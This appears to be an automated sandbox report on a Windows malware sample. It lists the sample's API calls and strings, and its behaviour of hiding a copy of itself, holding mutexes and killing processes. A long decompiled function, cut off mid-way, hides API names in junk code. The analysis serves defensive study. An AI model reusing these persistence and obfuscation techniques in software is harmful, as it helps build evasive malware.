GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F62F83
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F62FAA
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F62FD2
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F62FFA
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F630F2
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F63119
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00F63141
GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 00F63199
CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00F631B0
CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00F631CC
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00F6324D
GetTickCount.KERNEL32 ref: 00F632BF
__itow.LIBCMT ref: 00F632C6
GetCommandLineA.KERNEL32 ref: 00F63398
__stat64i32.LIBCMT ref: 00F635D5
Sleep.KERNEL32(00000D05,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F635E6
__stat64i32.LIBCMT ref: 00F635F7
Sleep.KERNEL32(000007D0), ref: 00F63728
__stat64i32.LIBCMT ref: 00F63739
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00F63769
SetFileAttributesA.KERNEL32(74CB4EE1,00000080), ref: 00F63775
CopyFileA.KERNEL32(?,74CB4EE1,00000000), ref: 00F63797
GetCommandLineA.KERNEL32(00000000), ref: 00F638B0
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00F638E5
LoadLibraryA.KERNEL32(00000000), ref: 00F639CF
GetProcAddress.KERNEL32(?,00000000), ref: 00F639F6
WSAStartup.WS2_32(00000202,?), ref: 00F63BA4
CloseHandle.KERNEL32(000004A0), ref: 00F63C80
SetFileAttributesA.KERNELBASE(?,00000080), ref: 00F63C92
CopyFileA.KERNEL32(?,?,00000000), ref: 00F63CA8
SetFileAttributesA.KERNELBASE(?,00000002), ref: 00F63CBB
Sleep.KERNEL32(000007D0), ref: 00F63D79
SetFileAttributesA.KERNEL32(C:\helrrxxyrxmppnn\lxugwbfrq.exe,00000080), ref: 00F63D8F
CopyFileA.KERNEL32(?,C:\helrrxxyrxmppnn\lxugwbfrq.exe,00000000), ref: 00F63DA3
SetFileAttributesA.KERNEL32(C:\helrrxxyrxmppnn\lxugwbfrq.exe,00000002), ref: 00F63DB0
__snprintf.LIBCMT ref: 00F63ED1
Sleep.KERNELBASE(000003E8), ref: 00F63CFF

Part of subcall function 00F66260: _memset.LIBCMT ref: 00F662B1
Part of subcall function 00F66260: CreateProcessA.KERNELBASE(?,00000008,00000000,00000000,00000000,00000008,00000000,00000000,?,0000159F), ref: 00F662EC
Part of subcall function 00F66260: CloseHandle.KERNEL32(0000001F), ref: 00F662FA
Part of subcall function 00F66260: CloseHandle.KERNEL32(0000159F), ref: 00F66304

Part of subcall function 00F6F090: WaitForSingleObject.KERNEL32(?,00004E20,00000000,00000000,?,181DD011,?,00000000), ref: 00F6F0DD

Part of subcall function 00F7DF62: _doexit.LIBCMT ref: 00F7DF6E

SetFileAttributesA.KERNEL32(74CB4EE1,00000080), ref: 00F6384E

Part of subcall function 00F696D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F6974D
Part of subcall function 00F696D0: Process32First.KERNEL32(00000000,?), ref: 00F6976F
Part of subcall function 00F696D0: OpenProcess.KERNEL32(00000001,?,?,00000000), ref: 00F697F3
Part of subcall function 00F696D0: TerminateProcess.KERNEL32(00000000,000000FF), ref: 00F69827
Part of subcall function 00F696D0: CloseHandle.KERNEL32(00000000), ref: 00F6982E
Part of subcall function 00F696D0: Process32Next.KERNEL32(00000000,00000128), ref: 00F69885

Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F6367B

Part of subcall function 00F72E30: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F72EEF
Part of subcall function 00F72E30: Process32First.KERNEL32(00000000,?), ref: 00F72F37

_memset.LIBCMT ref: 00F63F06
_memset.LIBCMT ref: 00F63F19
CreateThread.KERNEL32 ref: 00F63F30
Sleep.KERNEL32(0000C350), ref: 00F63F75

Strings

7i\, xrefs: 00F61C18, 00F61C21
C:\Users\user, xrefs: 00F6317D
C:\helrrxxyrxmppnn\lxugwbfrq.exe, xrefs: 00F63B47, 00F63D8A, 00F63D97, 00F63DAB, 00F63EEB
d#LP, xrefs: 00F6344E

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: AddressProc$File$Create$AttributesSleep$_memset$CloseHandleLibraryLoad$CopyMutexProcessProcess32__stat64i32$CommandFirstLineModuleNameSnapshotToolhelp32_malloc$CountEnvironmentNextObjectOpenSingleStartupTerminateThreadTickVariableWait__itow__snprintf_doexit_free
String ID: 7i\$C:\Users\user$C:\helrrxxyrxmppnn\lxugwbfrq.exe$d#LP
API String ID: 2508858977-4047308045
Opcode ID: 55349e367834e7fd0c8b8d5a5c91aed7efc62248e3476bc41b467f798f74acc0
Instruction ID: b6281cf6be9ef23968f40a8b182b2a2d5e8dacd8ab230964c1d8b2b195f8e2c2
Opcode Fuzzy Hash: 55349e367834e7fd0c8b8d5a5c91aed7efc62248e3476bc41b467f798f74acc0
Instruction Fuzzy Hash: EF43E6B0D0070CEBEB10AF70EC8AB6A3BB4FB46740F044455F584AB2A6EE755924FB55

Uniqueness

Uniqueness Score: -1.00%

Function 00F67210 Relevance: 59.7, APIs: 13, Strings: 20, Instructions: 1960
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00F67210(signed int __ebx, void* __edi, void* __esi) {
				signed char _v8;
				long long _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v28;
				signed int _v32;
				long long _v36;
				signed long long _v44;
				intOrPtr _v50;
				char _v52;
				short _v57;
				char _v58;
				short _v60;
				char _v64;
				char _v65;
				short _v67;
				char _v68;
				intOrPtr _v72;
				char _v76;
				short _v81;
				intOrPtr _v85;
				short _v87;
				intOrPtr _v91;
				char _v92;
				short _v97;
				intOrPtr _v101;
				short _v103;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				char _v125;
				short _v127;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _t410;
				signed int _t413;
				struct HINSTANCE__* _t419;
				signed char _t421;
				_Unknown_base(*)()* _t422;
				intOrPtr _t423;
				signed char _t427;
				signed short _t429;
				signed char _t436;
				signed char _t437;
				signed char _t439;
				short _t440;
				_Unknown_base(*)()* _t442;
				signed char _t445;
				signed char _t446;
				signed char _t448;
				struct HINSTANCE__* _t457;
				_Unknown_base(*)()* _t458;
				signed char _t462;
				signed char _t463;
				signed char _t465;
				signed char _t473;
				signed char _t476;
				signed char _t477;
				intOrPtr _t479;
				signed int _t484;
				signed char _t487;
				signed short _t488;
				intOrPtr _t494;
				signed char _t496;
				intOrPtr _t497;
				signed char _t498;
				signed short _t507;
				signed char _t511;
				signed char _t513;
				signed short _t515;
				signed char _t517;
				signed int _t518;
				signed char _t519;
				signed char _t522;
				signed char _t525;
				signed short _t526;
				signed char _t527;
				void* _t536;
				signed char _t537;
				signed char _t539;
				signed char _t542;
				signed char _t543;
				short _t544;
				signed char _t549;
				intOrPtr _t551;
				signed char _t568;
				signed char _t570;
				signed char _t572;
				signed char _t573;
				signed char _t576;
				signed char _t580;
				signed char _t582;
				signed char _t587;
				intOrPtr _t588;
				signed char _t590;
				void* _t591;
				signed char _t593;
				signed char _t594;
				signed char _t598;
				void* _t600;
				signed char _t601;
				signed char _t604;
				intOrPtr _t610;
				intOrPtr _t620;
				signed int _t622;
				signed int _t623;
				signed int _t624;
				intOrPtr _t626;
				struct HINSTANCE__* _t628;
				signed int _t630;
				signed char _t632;
				signed char _t634;
				signed char _t639;
				struct HINSTANCE__* _t640;
				signed char _t642;
				signed char _t643;
				struct HINSTANCE__* _t644;
				intOrPtr _t648;
				signed int _t650;
				intOrPtr _t652;
				signed char _t657;
				signed short _t658;
				signed char _t659;
				signed short _t660;
				intOrPtr _t661;
				intOrPtr _t663;
				signed char _t665;
				signed char _t667;
				signed short _t671;
				signed int _t672;
				intOrPtr _t674;
				intOrPtr _t675;
				intOrPtr _t677;
				signed char _t680;
				signed int _t684;
				signed long long _t686;
				signed char _t688;
				signed char _t691;
				signed char _t692;
				signed char _t696;
				signed int _t697;
				signed char _t699;
				intOrPtr _t700;
				signed char _t702;
				intOrPtr _t704;
				signed short _t706;
				intOrPtr _t708;
				intOrPtr _t709;
				signed int _t710;
				signed int _t712;
				signed char _t714;
				signed char _t716;
				signed int _t717;
				intOrPtr _t719;
				signed long long _t721;
				intOrPtr _t724;
				signed int _t725;
				signed char _t727;
				signed short _t729;
				signed int _t730;
				signed char _t735;
				intOrPtr _t743;
				signed int _t744;
				signed short _t746;
				signed char _t748;
				intOrPtr _t749;
				signed int _t751;
				signed char _t753;
				signed short _t754;
				intOrPtr _t755;
				signed char _t756;
				signed int _t757;
				signed int _t759;
				signed int _t761;
				struct HINSTANCE__* _t765;
				signed short _t766;
				intOrPtr _t770;
				intOrPtr _t771;
				struct HINSTANCE__* _t772;
				signed short _t774;
				signed char _t775;
				signed char _t778;
				intOrPtr _t782;
				signed char _t788;
				intOrPtr _t789;
				intOrPtr _t790;
				intOrPtr _t794;
				signed char _t797;
				signed char _t798;
				signed short _t800;
				intOrPtr _t801;
				intOrPtr _t805;
				intOrPtr _t807;
				intOrPtr _t809;
				signed char _t811;
				intOrPtr _t812;
				signed char _t813;
				signed char _t817;
				signed char _t819;
				intOrPtr _t821;
				signed char _t824;
				signed char _t829;
				signed char _t830;
				signed char _t832;
				intOrPtr _t834;
				signed short _t835;
				signed char _t841;
				signed char _t842;
				intOrPtr _t843;
				signed char _t844;
				intOrPtr _t845;
				intOrPtr _t848;
				signed char _t849;
				signed char _t854;
				intOrPtr _t855;
				signed int _t861;
				signed char _t863;
				short _t866;
				signed char _t868;
				signed char _t869;
				signed short _t871;
				signed char _t872;
				signed char _t873;
				intOrPtr _t874;
				intOrPtr _t875;
				signed int _t876;
				void* _t879;
				void* _t880;
				signed short* _t881;
				signed int _t926;
				signed int _t930;
				signed long long _t939;
				signed long long _t955;
				signed int _t963;
				signed int _t964;
				long long _t973;
				signed int _t974;
				signed int _t991;
				signed int _t994;
				signed int _t999;
				signed char _t1001;
				long long _t1002;
				signed int _t1003;
				signed int _t1007;
				long long _t1013;
				signed long long _t1014;
				signed char _t1020;
				signed int _t1023;
				signed int _t1041;
				signed long long _t1053;
				signed int _t1054;
				signed int _t1056;
				signed long long _t1069;
				signed int _t1086;
				signed long long _t1088;
				signed int _t1101;
				signed int _t1123;
				signed long long _t1124;
				signed long long _t1132;
				signed int _t1134;
				signed int _t1147;
				signed long long _t1156;
				signed int _t1176;
				signed long long _t1183;
				signed long long _t1195;
				signed int _t1198;
				signed long long _t1202;
				signed int _t1225;
				signed int _t1227;
				signed int _t1255;
				signed long long _t1268;
				signed long long _t1271;
				signed long long _t1285;
				signed int _t1291;
				signed long long _t1295;
				signed int _t1298;
				signed long long _t1302;
				signed int _t1305;
				long long _t1310;
				intOrPtr _t1318;
				signed long long _t1320;
				signed long long _t1324;
				signed int _t1325;
				long long _t1329;
				signed int _t1331;
				signed int _t1333;
				signed long long _t1334;
				signed long long _t1337;
				signed int _t1360;
				signed int _t1365;
				signed int _t1374;
				signed int _t1386;

				_t622 = __ebx;
				_push(__ebx);
				_t410 =  *0xfae2fc; // 0x87a9e522
				_t624 =  *0xfae350; // 0xdea3a412
				 *0xfae350 = _t410 * _t624;
				_v20 =  *0xfae1e4;
				_v128 = 0x65;
				asm("fsubr qword [0xfa85c8]");
				_v104 = 0x65;
				_v112 = 0;
				_v57 = 0x74;
				asm("fsubr qword [ebp-0x10]");
				_v67 = 0x656c;
				_v127 = 0x7463;
				_v58 = 0x6e;
				 *0xfae1e4 =  *0xfae4e0;
				_v140 = 0x53726f46;
				_v76 = 0x736f6c43;
				_t926 =  *0xfae110 +  *0xfa75c8;
				_v64 = 0x45746553;
				_v136 = 0x6c676e69;
				_v101 = 0x6c642e32;
				_v116 = 0x64616572;
				_v85 = 0x746e6576;
				_v103 = 0x336c;
				_v91 = 0x74616572;
				_v132 = 0x6a624f65;
				_v125 = 0;
				_v50 = 0x706565;
				_v60 = 0x6576;
				_v52 = 0x6c53;
				_v120 = 0x68546574;
				_v87 = 0x4565;
				_v108 = 0x6e72654b;
				_v97 = 0x6c;
				_v72 = 0x6e614865;
				_v144 = 0x74696157;
				_v124 = 0x61657243;
				_v81 = 0x41;
				_v92 = 0x43;
				_v68 = 0x64;
				_v65 = 0;
				 *0xfae110 = _t926;
				_t757 =  *0xfae1d0; // 0x2f751c98
				_v32 = _t757 - 0x5851c7f0;
				asm("fild dword [ebp-0x1c]");
				_v20 = _t926;
				_t413 =  *0xfae5dc; // 0xf99f
				_v32 = _t413;
				_v20 =  *0xfae110 + _v20;
				asm("fild dword [ebp-0x1c]");
				 *0xfae5dc = E00F7CABC();
				_t930 =  *0xfae150;
				_t759 =  *0xfae4d4; // 0x84901a2a
				_v20 = _t930;
				_v32 = _t759;
				asm("fild dword [ebp-0x1c]");
				asm("fsubr qword [ebp-0x10]");
				 *0xfae15c = _t930;
				 *0xfae0b4 =  *0xfae0b4 *  *0xfa85c4;
				_t626 =  *0xfae3e8; // 0xa0a95d4a
				 *0xfae0c4 =  *0xfae0c4 + 0x9deb6587 - _t626;
				_v20 =  *0xfae4f8;
				_v20 =  *0xfae560 + _v20;
				asm("fsubr qword [ebp-0x10]");
				_v20 =  *0xfae0d8;
				_v32 =  *0xfae290 & 0x0000ffff;
				asm("fild dword [ebp-0x1c]");
				 *0xfae290 = E00F7CABC();
				asm("fld1");
				_t48 =  &_v108; // 0x6e72654b
				_t939 = st0;
				asm("fsubp st2, st0");
				asm("fxch st0, st1");
				 *0xfae0d8 = _t939;
				 *0xfae4f8 = _t939 +  *0xfae4f8;
				_t419 = GetModuleHandleA(_t48);
				_t761 =  *0xfae594; // 0x80000001
				 *0xfafc6c = _t419;
				_t628 =  *0xfafc6c; // 0x74ca0000
				_t49 =  &_v92; // 0x43
				 *0xfae594 = _t761 * 0x569b7190;
				_t421 = GetProcAddress(_t628, _t49);
				 *0xfafc90 = _t421;
				 *0xfae0bc = ( *0xfae0bc & 0x0000ffff) - 0x1532122a;
				 *0xfae058 =  *0xfae058 +  *0xfa75c8;
				_v12 =  *0xfae078;
				_v20 =  *0xfa85c0 -  *0xfae3b8;
				asm("fsubr qword [ebp-0x10]");
				asm("fsubr qword [ebp-0x8]");
				 *0xfae078 =  *0xfae058;
				asm("fld1");
				asm("fsubp st1, st0");
				asm("fucompp");
				asm("fnstsw ax");
				if((_t421 & 0x00000044) != 0) {
					_v20 =  *0xfae344;
					 *0xfae568 =  *0xfae568 * _v20;
				} else {
					_t1386 =  *0xfae0f4;
					_t620 =  *0xfae4d0; // 0x6c745516
					_v20 = _t1386;
					_v32 = _t620 + 0x2d8f8990;
					asm("fild dword [ebp-0x1c]");
					asm("fsubr qword [ebp-0x10]");
					 *0xfae0f4 = _t1386;
					 *0xfae4d0 =  *0xfae4d0 + 1;
				}
				_t765 =  *0xfafc6c; // 0x74ca0000
				_t58 =  &_v124; // 0x61657243
				_t422 = GetProcAddress(_t765, _t58);
				_v20 =  *0xfae07c;
				 *0xfafc88 = _t422;
				_t955 =  *0xfae5f0 * _v20;
				 *0xfae5f0 = _t955;
				_t423 =  *0xfae340; // 0x1a61
				_t630 =  *0xfae350; // 0xdea3a412
				_v32 = _t630 + _t423 + 0xd7ed7ead;
				asm("fild dword [ebp-0x1c]");
				 *0xfae0a4 = _t955;
				_t766 =  *0xfae0bc; // 0xdec
				_t427 = _t766 - 0x38c155fe;
				if(_t427 != 0x8f287cd0) {
					_v20 =  *0xfae4c8 -  *0xfa85b0;
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					 *0xfae2b8 =  *0xfae2b8 +  *0xfa75c8;
					if((_t427 & 0x00000001) == 0) {
						 *0xfae2d8 = ( *0xfae2d8 & 0x0000ffff) + 0x14cf0cb9;
					}
				} else {
					asm("fld1");
					asm("faddp st1, st0");
					_t756 =  *0xfae2e8; // 0xff800000
					_t876 =  *0xfae0e8; // 0x80000000
					_v32 = _t876;
					asm("fild dword [ebp-0x1c]");
					_v8 = _t756;
					 *0xfae0e8 = E00F7CABC();
				}
				_t632 =  *0xfae17c; // 0xb2a9
				_v8 = _t632;
				_t963 =  *0xfae394 -  *0xfa85a8 +  *0xfa85a4;
				_v20 = _t963;
				asm("fild dword [ebp-0x4]");
				_t964 = _t963 + _v20;
				 *0xfae17c = E00F7CABC();
				_t429 =  *0xfae598; // 0x0
				_t634 =  *0xfae2ec; // 0x76d570f4
				_t623 = _t622 | 0xffffffff;
				 *0xfae598 =  *0xfae598 + _t623;
				 *0xfae2ec =  *0xfae2ec + _t623;
				if(( *0xfae4c4 & 0x0000ffff) - _t429 + _t634 >= ( *0xfae1e8 & 0x0000ffff) + 0x4457a804) {
					_t770 =  *0xfae44c; // 0x2575
					_t771 =  *0xfae38c; // 0x93fc1fed
					 *0xfae574 =  *0xfae574 + 0xc2233ff5 - _t770 + _t771;
					 *0xfae44c =  *0xfae44c + _t623;
				} else {
					_t875 =  *0xfae334; // 0xc334
					_t755 =  *0xfae3e8; // 0xa0a95d4a
					 *0xfae334 = _t875 - _t755 - 0x26896fb8;
				}
				_t436 =  *0xfae208; // 0x5884a3d
				_v8 = _t436;
				asm("fild dword [ebp-0x4]");
				_v20 = _t964;
				asm("fsubr qword [ebp-0x10]");
				_t437 = E00F7CABC();
				_t772 =  *0xfafc6c; // 0x74ca0000
				_t73 =  &_v64; // 0x45746553
				 *0xfae208 = _t437;
				 *0xfb0438 = GetProcAddress(_t772, _t73);
				_t439 =  *0xfae368; // 0x80000000
				_v8 = _t439;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				 *0xfae584 =  *0xfae3f8 -  *0xfa8598;
				 *0xfae368 =  *0xfae368 + 1;
				asm("fld1");
				asm("fxch st0, st1");
				 *0xfae3f8 =  *0xfae3f8 - st0;
				 *0xfae1a4 = 0xce95bf56;
				_t973 =  *0xfae420 +  *0xfa8590 -  *0xfa8588;
				 *0xfae468 = _t973;
				asm("fsubr qword [0xfae420]");
				 *0xfae420 = _t973;
				_t974 =  *0xfae190;
				asm("fld1");
				asm("faddp st1, st0");
				 *0xfae190 = _t974;
				_t639 =  *0xfae028; // 0x781e
				_v8 = _t639;
				asm("fild dword [ebp-0x4]");
				_v20 = _t974;
				asm("fsubr qword [ebp-0x10]");
				_t440 = E00F7CABC();
				_t640 =  *0xfafc6c; // 0x74ca0000
				 *0xfae028 = _t440;
				_t77 =  &_v144; // 0x74696157
				_t442 = GetProcAddress(_t640, _t77);
				_t774 =  *0xfae128; // 0x2069
				 *0xfb04e4 = _t442;
				 *0xfae128 =  *0xfae128 + 1;
				if(_t774 + 0x549910d5 == 0x8eb1ee46) {
					_t445 =  *0xfae17c; // 0xb2a9
					_v8 = _t445;
					_v20 =  *0xfae4b0 -  *0xfa8578;
					asm("fild dword [ebp-0x4]");
					_t446 = E00F7CABC();
					 *0xfae17c = _t446;
				} else {
					_t754 =  *0xfae10c; // 0x3ef9
					_t874 =  *0xfae0c4; // 0xdf1431b
					_t446 = _t754 - _t874 + 0x277efece;
					 *0xfae10c = _t446;
					 *0xfae0c4 =  *0xfae0c4 + 1;
				}
				_v20 =  *0xfae3c8 -  *0xfae2a4;
				asm("fsubp st1, st0");
				 *0xfae5b8 =  *0xfae068 + _v20;
				asm("fld1");
				asm("fxch st0, st1");
				 *0xfae068 =  *0xfae068 - st0;
				asm("fld1");
				asm("fsubp st2, st0");
				asm("fxch st0, st1");
				 *0xfae2a4 = st0;
				_t775 =  *0xfae280; // 0xf447b558
				 *0xfae280 =  *0xfae280 + 1;
				_v8 = _t775 - 0x2feb6c5f;
				_v20 =  *0xfae054 -  *0xfa8570;
				asm("fild dword [ebp-0x4]");
				_t991 = _v20;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t446 & 0x00000044) != 0) {
					st1 = _t991;
					_v20 =  *0xfae2b4;
					_t994 =  *0xfae278 + _v20;
					 *0xfae278 = _t994;
				} else {
					asm("fsubrp st2, st0");
					asm("fxch st0, st1");
					 *0xfae1a4 =  *0xfae1a4 + st1;
					_v20 =  *0xfae2b8 -  *0xfa8568;
					_t994 =  *0xfae1a4 -  *0xfa8560;
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					if((_t446 & 0x00000001) == 0) {
						_t610 =  *0xfae0cc; // 0x35085801
						_v8 = _t610 - 0x697385f6;
						asm("fild dword [ebp-0x4]");
						_v20 = _t994;
						_t994 =  *0xfae0f4 + _v20;
						 *0xfae0f4 = _t994;
					}
				}
				_t642 =  *0xfae49c; // 0x3b0d
				_v8 = _t642;
				asm("fild dword [ebp-0x4]");
				_v20 = _t994;
				asm("fsubr qword [ebp-0x10]");
				 *0xfae49c = E00F7CABC();
				 *0xfae478 =  *0xfae478 + _t623;
				_t448 =  *0xfae478; // 0x8f288571
				if(_t448 != 0x980e2413) {
					_t778 =  *0xfae17c; // 0xb2a9
					_t999 =  *0xfae5e4 +  *0xfa854c;
					_t643 =  *0xfae060; // 0x675b
					_v8 = _t778;
					_v20 = _t999;
					asm("fild dword [ebp-0x4]");
					_v8 = _t643;
					asm("fsubr qword [ebp-0x10]");
					_v20 = _t999;
					asm("fild dword [ebp-0x4]");
					 *0xfae060 = E00F7CABC();
					 *0xfae17c =  *0xfae17c + 1;
					_t1001 = _t999 + _v20 +  *0xfae5e4;
					 *0xfae5e4 = _t1001;
				} else {
					_t1374 =  *0xfae43c;
					_t753 =  *0xfae0ec; // 0x2a1f8050
					_v20 = _t1374;
					_v8 = _t753;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0x10]");
					_v20 = _t1374;
					asm("fsubr qword [ebp-0x10]");
					 *0xfae0c8 = E00F7CABC();
					_t1001 =  *0xfae444 - st1;
					 *0xfae444 = _t1001;
					asm("fsubr dword [0xfae43c]");
					 *0xfae43c = _t1001;
				}
				_t644 =  *0xfafc6c; // 0x74ca0000
				_t106 =  &_v76; // 0x736f6c43
				 *0xfb02b0 = GetProcAddress(_t644, _t106);
				 *0xfae4fc =  *0xfae4fc + 1;
				if(( *0xfae018 & 0x0000ffff) - 0x798a1f5c != 0x97e134f1 - ( *0xfae4fc & 0x0000ffff)) {
					_t873 =  *0xfae0f8; // 0x1e53
					_v8 = _t873;
					asm("fild dword [ebp-0x4]");
					 *0xfae2e8 = _t1001;
				}
				_t1002 =  *0xfae0d0;
				_t648 =  *0xfae4f0; // 0xcfdf72e0
				_v8 = _t648 - 0x2fc29afe;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				 *0xfae0d0 = _t1002;
				 *0xfae4f0 =  *0xfae4f0 + 1;
				_t782 =  *0xfae0e8; // 0x80000000
				_t650 =  *0xfae478; // 0x8f288571
				 *0xfae478 = _t650 * (0x414a94e1 - _t782);
				 *0xfae0e8 =  *0xfae0e8 + _t623;
				_t457 =  *0xfafc6c; // 0x74ca0000
				_t458 = GetProcAddress(_t457,  &_v52);
				_t652 =  *0xfae01c; // 0x9b827a58
				 *0xfafc60 = _t458;
				 *0xfae4d4 = _t652 +  *0xfae4d4;
				 *0xfae2fc =  *0xfae2fc + 0xc279a6ca - ( *0xfae2ac & 0x0000ffff);
				 *0xfae31c =  *0xfae31c + _t623;
				if(0x97c2a27b - ( *0xfae31c & 0x0000ffff) == 0x889491e4) {
					 *0xfae2ec =  *0xfae2ec + _t623;
					_t872 =  *0xfae2ec; // 0x76d570f4
					_v8 = _t872;
					asm("fild dword [ebp-0x4]");
					 *0xfae1e0 = _t1002;
				}
				_t1003 =  *0xfae0a4;
				_t462 =  *0xfae24c; // 0x97715537
				_v36 = _t1003;
				_v8 = _t462;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1003;
				asm("fsubr qword [ebp-0x20]");
				 *0xfae0a4 =  *0xfae15c + _v20;
				asm("fld1");
				_t1007 = st0;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0xfae15c = _t1007;
				 *0xfae24c =  *0xfae24c + 1;
				_t657 =  *0xfae0bc; // 0xdec
				_v8 = _t657;
				 *0xfb0448 = 0xfa3935;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1007;
				asm("fsubr qword [ebp-0x10]");
				_v36 =  *0xfae344 -  *0xfa8548;
				_t463 =  *0xfae5b4; // 0x1cd4719a
				asm("fsubr qword [0xfa8540]");
				_v8 = _t463;
				_v20 =  *0xfae3a8;
				asm("fild dword [ebp-0x4]");
				asm("fsubr qword [ebp-0x10]");
				asm("fucompp");
				asm("fnstsw ax");
				asm("fld1");
				_t1013 =  *0xfae3a8 + st0;
				asm("fxch st0, st1");
				 *0xfae3a8 = _t1013;
				 *0xfae0bc =  *0xfae0bc + 1;
				if((_t463 & 0x00000044) != 0) {
					st0 = _t1013;
				} else {
					_t1013 =  *0xfae428 +  *0xfa8538;
					 *0xfae060 = E00F7CABC();
					asm("fsubr qword [0xfae428]");
					 *0xfae428 = _t1013;
				}
				_t658 =  *0xfae398; // 0x3cdb
				if(_t658 < 0xb67adf3e) {
					 *0xfae1e0 =  *0xfae1e0 + st1;
					_t1013 =  *0xfae1e0;
					 *0xfae3a8 = _t1013;
				}
				asm("fsubr dword [0xfae0a8]");
				_t879 = 0;
				 *0xfae0a8 = _t1013;
				_t1014 =  *0xfae0a8;
				 *0xfae5b8 = _t1014;
				E00F7C990(0xfafdb8, 0, 0x4b0);
				_t465 =  *0xfae12c; // 0xd1b0ed04
				_v8 = _t465 - 0x6c9a36e0;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1014;
				asm("fsubr qword [ebp-0x10]");
				 *0xfae0e8 = E00F7CABC();
				asm("fld1");
				asm("fxch st0, st1");
				 *0xfae370 =  *0xfae370 - st0;
				 *0xfae12c =  *0xfae12c + 1;
				_v20 =  *0xfae1a4;
				_t1020 =  *0xfa8530 -  *0xfae3b8;
				 *0xfb073c = 0;
				asm("fsubr qword [ebp-0x10]");
				 *0xfae1a4 = _t1020;
				_t659 =  *0xfae024; // 0x80000001
				_v8 = _t659;
				asm("fild dword [ebp-0x4]");
				_v8 = _t1020;
				asm("fsubr dword [ebp-0x4]");
				 *0xfae024 = E00F7CABC();
				asm("fld1");
				_t1023 = st0;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0xfae468 = _t1023;
				_t788 =  *0xfae4fc; // 0xc1ce
				_v8 = _t788;
				asm("fild dword [ebp-0x4]");
				_v20 = _t1023;
				asm("fsubr qword [ebp-0x10]");
				 *0xfae4fc = E00F7CABC();
				 *0xfae1d4 =  *0xfae1d4 + st1;
				_v20 =  *0xfae074;
				 *0xfae0a4 =  *0xfae0a4 + _v20;
				 *0xfae074 =  *0xfae074 - st1;
				 *0xfae134 =  *0xfae134 -  *0xfa8528;
				_t660 =  *0xfae598; // 0x0
				_t789 =  *0xfae4f0; // 0xcfdf72e0
				 *0xfae598 =  *0xfae598 + _t623;
				if(_t789 <= _t660 + 0x5e719426) {
					 *0xfae1f0 =  *0xfae1f0 -  *0xfa8520;
				}
				_v20 =  *0xfae07c;
				_t473 =  *0xfae264; // 0x353dd48b
				_v8 = _t473;
				_v20 =  *0xfae428 + _v20;
				asm("fild dword [ebp-0x4]");
				 *0xfae264 = E00F7CABC();
				_t661 =  *0xfb0448; // 0xfa3935
				 *0xfae428 =  *0xfae428 + st2;
				if( *((intOrPtr*)(_t661 + 0x4b0)) == _t879) {
					L44:
					_t1041 =  *0xfae078;
					_t790 =  *0xfae440; // 0xeb96
					_v20 = _t1041;
					_t476 = _t790 - 0x379534d5;
					_v8 = _t476;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0x10]");
					 *0xfae078 = _t1041;
					 *0xfae440 =  *0xfae440 + 1;
					 *0xfae074 =  *0xfae074 - st1;
					_v20 =  *0xfae074;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t476 & 0x00000044) == 0) {
						_t729 =  *0xfae108; // 0x5dc4
						 *0xfae4d0 =  *0xfae4d0 + 0x52b08505 - _t729;
						 *0xfae108 =  *0xfae108 + 1;
					}
					 *0xfae490 =  *0xfae490 *  *0xfa84e0;
					_t477 =  *0xfae238; // 0x9ff1
					 *0xfae238 =  *0xfae238 + _t623;
					_v20 =  *0xfa84d8 -  *0xfae084;
					_v8 = 0xd3133a13 - _t477;
					asm("fild dword [ebp-0x4]");
					_t1053 = _v20;
					asm("fucompp");
					asm("fnstsw ax");
					if((_t477 & 0x00000044) == 0) {
						_t582 =  *0xfae320; // 0x1689
						_t1324 =  *0xfae388 -  *0xfa84d4;
						_v8 = _t582;
						_v20 = _t1324;
						asm("fild dword [ebp-0x4]");
